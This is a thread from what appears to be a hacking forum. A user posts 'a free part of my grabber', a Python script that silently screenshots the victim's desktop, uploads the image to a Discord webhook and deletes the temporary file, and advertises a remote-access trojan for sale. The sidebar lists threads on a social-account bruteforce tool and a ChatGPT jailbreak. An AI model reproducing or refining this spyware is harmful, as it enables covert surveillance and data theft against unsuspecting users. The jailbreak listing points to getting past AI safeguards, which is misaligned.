Temporary Advertisements:
Ad
Ad
Ad
a free part of my grabber
by stackunderflow - Wednesday June 5, 2024 at 10:02 AM
#1
im working on a rat in like 3 days it will be done i will sell it for 40$ lifetime dm me

null
import os
from discord_webhook import DiscordWebhook, DiscordEmbed
from PIL import ImageGrab
user = os.path.expanduser("~")
hook =""
def screen():
    sss = ImageGrab.grab()
    temp_path = os.path.join(user, "AppData\\Local\\Temp\\ss.png")
    sss.save(temp_path)
    webhook = DiscordWebhook(url=hook)
    embed = DiscordEmbed(title="Screenshot", description="Latest screenshot capture.", color=242424)
    embed.set_author(name="kggrabber", icon_url="")
    embed.set_image(url="")
    embed.set_footer(text="kalogz on breachforums")
    webhook.add_embed(embed)
    webhook.execute()
    webhook = DiscordWebhook(url=hook)
    with open(temp_path, "rb") as f:
        webhook.add_file(file=f.read(), filename='ss.png')
    webhook.execute()
    try:
        os.remove(temp_path)
    except Exception as e:
        print(f"Error removing file: {e}")
screen()
Reply
#2
bro please .......

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Arrested
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Bruteforce Tool Attack (Facebook, Instagram, Gmail and X) 1yush 165 7,948 1 hour ago
Last Post: h4shy
  ChatGPT jailbreak unlock baalware 304 41,032 1 hour ago
Last Post: sybau012000
  [FREE] Latest OSEP / PEN-300 - complete course PDF + videos Tamarisk 1,078 102,316 2 hours ago
Last Post: maddock
  [PDF] OSCP Exam preparation pdfs cam3lsoft 340 14,724 2 hours ago
Last Post: maddock
  [FREE] CRTO I and II - Red Team Ops lessons by Zero-Point Security Tamarisk 1,717 163,034 2 hours ago
Last Post: maddock

Forum Jump:


 Users browsing this forum: 1 Guest(s)